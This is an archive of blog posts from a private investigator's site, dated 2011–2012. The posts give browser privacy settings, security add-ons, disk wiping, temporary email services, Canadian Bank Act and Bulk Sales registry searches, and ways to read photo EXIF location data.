Archive for the 'Methods' Category

FireFox V.10

Published on February 2, 2012 in Methods, Power User Tips, Search Leakage, The Investigator's Computer and Web Worker. 0 Comments Tags: , .

The biggest change in V.10 that most Firefox users will see is the smaller number of add-ons marked as incompatible. About 80 percent of all add-ons should now be compatible. Previously, most add-ons would break when Firefox released a major update.

V.10 seems to work much better than any V.9 iteration. No more crashing and the add-ons and extensions work properly. I guess I will be able to stay with Firefox for a while yet.

Extended Support Release

Mozilla also released the enterprise version of Firefox, called ESR (Extended Support Release), which will release updates on a slower cycle (once per year) so that businesses don’t have to worry about their internal tools and security protocols failing. This should help make Firefox more popular in the corporate world.

 

Remote File Handling

Published on January 30, 2012 in Dirty Tricks, Due Diligence, Methods, Privacy and Security. 0 Comments Tags: , .

High Risk Files

When doing IIR, I often come across files that I don’t want to handle for security reasons. These can be Word documents, PDF documents, PostScript, or even Gzipped PostScript files. These file may include a load of malicious code. I sometimes don’t want any record of viewing the file on my computer. To accomplish this I must load these files remotely and safely so they don’t touch your system (the web cache should be disabled to accomplish a true remote viewing of the file as should the swap and home partitions, if the whole system isn’t encrypted).

Unless you verify each file through checksum verification (like MD5 or GPG) there’s a chance they could’ve been trojaned or the file may contain phoning home instructions or some other type of malicious feature within the file. If I don’t want to be recorded as a recipient of the file via something like ReadNotify then the file must be verified clear of such code or it must be viewed remotely.

The Remote File Viewer

I use the site at http://view.samurajdata.se/. I have only used it with PDF and Word documents. PDF and Word files are transformed into single paged graphics which you may navigate through. Most of the time it works, occasionally a PDF does not load. It doesn’t require Flash and works without cookies or javascript enabled.

I don’t know anything about the site’s privacy policy and how that might that might affect anonymity.

 

 

The Clean Machine

Published on January 27, 2012 in Methods, Power User Tips, Private Investigator, Security and The Investigator's Computer. 0 Comments Tags: , .

When doing IIR, the computers must be free of malicious code (S. 31 Canada Evidence Act). We often set aside a computer for this purpose after doing some Spring-Cleaning. But how we prepare the machine for the installation of the clean version of the OS and application software is important.

We use Darik’s Boot and Nuke (“DBAN“) which is a self-contained boot disk that securely wipes the hard disks of most computers. DBAN will automatically and completely delete the contents of any hard disk that it can detect, which also makes it an appropriate utility for bulk or emergency data destruction. DBAN is a means of ensuring due diligence in computer prepartation for IIR. It is also a good way to periodically clean a Microsoft Windows installation of viruses and spyware.

 

Securing Firefox – Configuration Settings

Published on January 23, 2012 in How to Become a Professional Private Investigator, Methods, Power User Tips, Privacy, Private Investigator, Search Leakage, Security, The Investigator's Computer, Training & Education and Web Worker. 0 Comments Tags: , .

This is about stopping the dreaded disease, Data Diarrhea. The websites you visit can leave behind a trail of data on your computer and in their server logs. All of this Data Diarrhea can identify the Investigator and this can complicate the problem he is trying to solve. Lax privacy & configuration settings may also leave the Investigator’s computer vulnerable to attack by hackers.

This article describes more advanced methods of customizing Mozilla applications, by editing the configuration files.

about:config entries

about:config is a feature of Mozilla applications which lists application settings (known as preferences) that are read from the profile files prefs.js and user.js, and from application defaults. Many of these preferences are not present in the Options or Preferences dialog. Using about:config is one of several methods of modifying preferences and adding other “hidden” ones.

Editing the user.js and prefs.js files are an alternative method of modifying preferences and recommended for very advanced users only. Unless you need a prefs.js and/or user.js file modified for a specific purpose, you should use about:config instead.

This article refers to the Firefox V. 9 edition of the browser. These entries may have adverse effects on Thunderbird and Mozilla Suite/SeaMonkey and older versions of Firefox. These settings will affect all profiles of the browser.

In Firefox, type about:config in the Location Bar (address bar) and press Enter to display the list of preferences. You may get a warning page next, just click OK and move on.

about:config > browser.display.use_document_fonts > change value to 0

0: Never use document’s fonts
1: Allow documents to specify fonts to use
2: Always use document’s fonts (deprecated)

Don’t let the site access to the fonts on your computer. That grants too much access that can be abused.

about:config > browser.sessionhistory.max_entries > change value to 2

The maximum number of pages in the browser’s session history, i.e. the maximum number of URLs you can traverse purely through the Back/Forward buttons. Default value is 50.  Set it to 2 so that the site you visit can’t see where you have been during your Investigative Internet Research (IIR) assignment.

about:config > dom.storage.enabled > double click to false

dom.storage.enabled is a mechanism allowing web pages to store information with a web browser (similar to cookies) called “client-side session and persistent storage.” Although use of session storage is subject to a user’s cookie preferences, this preference allows it to be disabled entirely.

about:config > geo.enabled > double click to false

True is location aware browsing enabled. Default is true. You want to disable this. See http://www.mozilla.com/en-US/firefox/geolocation/ for details of geolocation in Firefox.

 

Securing Firefox – General Privacy Settings

Published on January 20, 2012 in How to Become a Professional Private Investigator, Methods, Private Investigator, Search Leakage, Security, The Investigator's Computer, Training & Education and Web Worker. 2 Comments Tags: , .

General Firefox Privacy Settings

The basic privacy settings in general settings, are found in the options bar in Firefox 9.0 (Firefox > Options > Options) or for iOS, Preferences.

  1. Content: Enable block popup windows and disable Javascript when it isn’t needed.
  2. Privacy: Enable the DNT (Do-Not-Track). For History, use custom settings. “Always use private browsing mode” should be enabled. “Remember my browsing history”, “Remember download history” and “Remember search and form history” should be turned off. “Accept cookies from sites”, but un-check “Accept third party cookies” as they aren’t needed often. Location bar: select “Suggest nothing”.
  3. Security: Enable “Warn me when sites try to install add-ons”, “Block reported attack sites” and “Block reported web forgeries”. Under Passwords, disable “Remember passwords for sites” and use a master password.
  4. Advanced – General – System Defaults: Disable “Submit crash reports and performance data”.
  5. Advanced – Network – Offline Storage: Check “Override automatic cache management and limit cache to 0MB space”. Further—you can un-check “Tell me when a website asks to store data for offline storage use”.
  6. Advanced – Encryption: Ensure both “Use SSL 3.0 and Use TLS 1.0″ are enabled. Then click validation > check “When an OCSP server connection fails, treat the certificate as invalid”.

 

 

The Cost of Investigative Internet Research

Published on January 16, 2012 in Courts, How to Become a Professional Private Investigator, Methods, Power User Tips, Private Investigator, Report Writing, The Investigator's Computer and Training & Education. 1 Comment Tags: , .

Why does it cost so much just to look on the Internet?”

I get this question a lot, and too often from “professionals” who should know better. I will list a few of the reasons here.

To begin with, I never know how the research results will be used in the future. That means that the results must be properly documented so that it would be reproducible if someone else with similar skill did the searches at the same time as I did.

If at some future date what I find becomes important evidence, then how it was found, where it was found, when it was found, and what it actually looked like becomes very important. My report and the supporting material may be the only proof of the existence of the material being entered into evidence.

The computers must be free of malicious code (S. 31 Canada Evidence Act). We often set aside a computer for this purpose after doing some Spring-Cleaning.

The logic of the research process must be clear and easy to explain to anyone. This logic must be explained in the report. Search statements must be recorded. The project directory and file naming and structures must be logical and properly documented. The evidence must have a clear and documented chain of custody.

Providing this evidence requires skill, training, experience, software, computers, office space, support staff, and time.  Finally, did you know it takes at least twice as long to do the report as it does to do the research?

 

Security & Privacy Add-ons for Firefox

Published on January 13, 2012 in Methods, Power User Tips, Privacy, Private Investigator, Search Leakage, Search Strategies and Security. 2 Comments Tags: , .

Firefox is the online researcher’s best friend. No other browser gives so much control to the user as Firefox. It is more customizable than either Google Chrome or Internet Explorer.

Like any browser, you must be aware of what data you are releasing when you visit a Web site. The following add-ons help eliminate two serious security threats that occur when doing Investigative Internet Research (IIR).

BetterPrivacy—This add-on is pretty basic, but a must have. BetterPrivacy deletes flash cookies (LSOs/SuperCookies).

KeyScrambler—Check out Alex Long’s post from Null Byte for information about what KeyScrambler is and how it works.

I have already written about:

  • NoScript— NoScript allows JavaScript, Java and other executable content to run only from trusted domains of your choice, e.g. your home-banking web site, and guards the “trust boundaries” against cross-site scripting attacks (XSS). Such a preemptive approach prevents exploitation of security vulnerabilities (known and even unknown!). This is a must-have for IIR.
  • HTTPS Everywhere—This is a must-have add-on provided by the Electronic Frontier Foundation. HTTPS Everywhere enables a secure connection on pages that have SSLCertificates.  For example, when you use Google search most people use the unencrypted version. This add-on will force Google to deploy its SSL certificate. The DuckDuckGo (DDG) search engine also uses a version of this.

 

 

The Next Browser

Published on December 16, 2011 in Methods, Power User Tips, Search Engines and Search Strategies. 2 Comments Tags: , , , .

I’m a digital troglodyte that doesn’t like change, but sometimes there is no avoiding it.

Recently, Google stopped paying Mozilla for the little Google search window at the top right of the Firefox browser.  Google has paid Mozilla about $1 per copy to have that window. Last year, that Google search window accounted for 84% of Mozilla’s $123 million of revenue, or about $100 million. However, Google’s Chrome browser has made remarkable strides against Firefox and the rest of the the browser field.

The loss of funding to support FireFox, and Chrome’s association with the largest search engine, may herald the end of FireFox.  No other browser gives so much control to the user like Firefox does. Most users don’t understand that Firefox is more customizable than either Google Chrome or Internet Explorer.  If Mozilla doesn’t find a way to replace the lost revenue, then expert searchers may loose their most fundamental and productive tool.  That will lead to a forced change for this digital troglodyte expert searcher.

 

Programme Cheatsheets

Published on December 12, 2011 in Methods and Power User Tips. 0 Comments Tags: , .

MakeUseOf Cheat Sheets  list shortcuts for common programmes that you use daily. These will make you more productive.

 

Copernic Agent & Google

Published on December 9, 2011 in Methods, Private Investigator, Search Engines and Search Strategies. 0 Comments Tags: , , , , .

I have used Copernic for years, and just accepted its lack of a Google search.  I just got used to it, and never sought a way to add Google.

At a recent conference, Kevin Ripa told me that a registry entry would solve the problem after I mentioned that it didn’t search Google.  If you’re going to feel like an idiot, its good to shown-up by a really smart guy like Kevin.

Go to the registry key:

[HKEY_CURRENT_USER\Software\Copernic\Agent\System]

and insert the following string:

EngineUpdateAddress=

with value, http://updates.copernic.com/k2upd/agentex

 

Bulk Sales & the PI

Published on December 7, 2011 in Canada, Company Research, Competitive Intelligence, Courts, Methods, Private Investigator and Sources. 0 Comments

BULK SALES ACT SEARCHES – Ontario Only

Sales of large quantities of stock or the sale of assets and equipment of the business itself outside the regular course of business are considered a sale “in bulk”. The Bulk Sales Act is designed to protect the creditors of a business owner by requiring the owner to follow the procedures of the Act for sales outside the regular course of business.

If a buyer wishes to purchase the assets and equipment of a business, the seller “in bulk” must provide an affidavit stating that all creditors have been paid, or they will be paid from the proceeds of the sale.  In some cases the buyer pays an assigned trustee and creditors of the business may wish to waive their rights in which case the proceeds are paid.

A ‘Bulk Sales search‘ determines if a bulk sales affidavit has been filed with the relevant Ontario Superior Court of Justice office.

The Private Investigator (PI)

If you are interested in an Ontario business’s assets, debts, cash flow, and general financial condition, then a a Bulk Sale Act search is an important search.  It may tell you if the business is failing or if it has suffered a set-back.  You may learn of an abandoned line or the sale of a production facility.  You may learn of a legal action in another jurisdiction by contacting or researching the other parties to the bulk sale. Any sale that indicates that creditors will be paid from the proceeds of the sale may indicate a judgment that is being satisfied or it may be part of the settlement of a claim.

 

The Bank Act & the PI

Published on December 5, 2011 in Canada, Company Research, Due Diligence, Legislation, Methods, Private Investigator, Risk Management and Sources. 0 Comments

The Bank Act

The Bank Act (1991, c. 46) is an Act of the Government of Canada respecting banks and banking.  The Canadian banking industry includes 20 domestic banks, 24 foreign bank subsidiaries and 22 foreign bank branches operating in Canada.

Canadian Banks & Lending

Canadian Banks have the right to lend money to wholesalers, retailers, shippers and dealers in “products of agriculture, products of aquaculture, products of the forest, products of the quarry and mine, products of the sea, lakes, and rivers, of goods, wares and merchandise, manufactured or otherwise” on the security of such goods or products, and to lend money to manufacturers on their goods and inventories.

The Private Investigator (PI)

When doing a background investigation of a person, the PI will be looking for previously unknown assets, banking and financial arrangements, or corporate affiliations.  When investigating a company, the PI will be looking for previously unknown assets, banking, and financial arrangements.  In both cases, the equity held by the subject in the assets will be of interest.  Searching the Bank Act Security Registry may reveal all of the above.

Bank Act Security Registry

Under S. 427 of the Bank Act, the borrower must sign a document that provides the bank with the first preferential lien on the goods or equipment.  The Bank then registers a ‘Notice of Intention‘ to take the goods as security, to perfect its security interest.

The Bank of Canada offers a Security Registry service which may be searched for registrations.  The search will reveal whether the Bank of Canada has taken security on property that may interest you.  If the Bank does have a claim on the property, then it means that it has loaned the customer money and that it has the right to take possession of and sell the property if the loan is not paid.  This is important for you to know for two reasons.  First, it shows that the person or business is indebted to a Canadian chartered bank and may have equity in the property listed in the security agreement.  Second, it may uncover previously unknown assets, banking and financial arrangements, or corporate affiliations. You will need to provide the name of the person or business being searched.

Years ago, we only did this when we suspected the subject person or company might have an interest in an agricultural business.  Today however, we find more non-agricultural businesses in the Bank of Canada registry. We have online access to the Bank of Canada registry to search for Bank Act Security items. The search results often indicate that a business assigned its inventory to a bank as security under the Bank Act.

A manual search for Notices of Intention filed under Section 427 of the Bank Act are conducted at the agency of the Bank of Canada in the province or territory where the debtor’s place of business is located. For Bank Act searches,  “agency” means, in a province, the office of the Bank of Canada or its authorized representative but does not include its Ottawa office, and in Yukon, the Northwest Territories and Nunavut means the office of the clerk of the court of each of those territories respectively [see S. 427(5)].

 

Power-Searcher Add-ons for FireFox

Published on November 30, 2011 in Methods, Power User Tips, Privacy, Private Investigator and Search Leakage. 0 Comments

WorldIP

This displays the IP address of the page you are visiting and the IP data that you are revealing about yourself. The IP data seems more up-to-date than a whois search.

Ghostery

Ghostery  lets you see who’s tracking your web browsing when you visit a webpage. It looks for third party page elements (3pes) on the web pages you visit. These can be things like social network plugins, advertisements, invisible pixels used for tracking and analytics, etc. Ghostery notifies you that these things are present, and which companies operate them. You can learn more about these companies, and if you wish, choose to block the 3pes they operate.

LongURLPlease

This replaces short urls with the originals, so you can see where links will send you.

 

Temporary Email Addresses

Published on November 2, 2011 in How to Become a Professional Private Investigator, Methods, Privacy, Private Investigator and Security. 0 Comments

An email address is often required to download or activate any registration page.  Unfortunately, that email address often becomes the target of spam. Perhaps you don’t want anybody to know you have registered for use of that site.  A solution to these problems is a temporary email address.

Mailinator

Mailinator requires no sign-up. Send email to a name, and the account is created automatically. You cannot send mail from this. Visit mailinator.com and type in the email name where it says “Check your inbox!”, then click “Go!”, and Mailinator will display the list of email waiting. there is no password.  The mailbox will only hold 10 messages at once. All attachments – pictures, binary files, etc. – are stripped out. The mailbox doesn’t disappear on any set schedule.

Use this for items that don’t require a high level of security.  Create your Mailinator address using an email account only accessed via Tor and only for signing-up to things like Mailinator.

10 Minute Mail

Go to 10 Minute Mail and copy the e-mail address to your clipboard and use it for registration.  Your e-mail address will expire in 10 minutes.

How to Find Out Where a Picture was Taken

Published on October 3, 2011 in Methods, Private Investigator and Search Strategies. 1 Comment Tags: , , , .

Most of the time, there isn’t much information available within the picture itself. However, certain smartphones (iphone) and high-end cameras have GPS built in, and geo-tag pictures. Advanced cameras also store metadata such as the model name, exposure settings, etc. Even without the location information, the Exchangeable Image File format (EXIF) info stored on the image is still useful in the evidence gathering process.

In Firefox, right click on the image and select Copy Image Location.

Go to http://regex.info/exif.cgi and paste the image location into the Image URL box. Now click on the View Image at URL button.

The next page displays EXIF info, or information on the Camera, and, if available, the GPS-based location where the picture was taken. Scroll down for the GPS info or click on the map service link in the box on the left side of the page.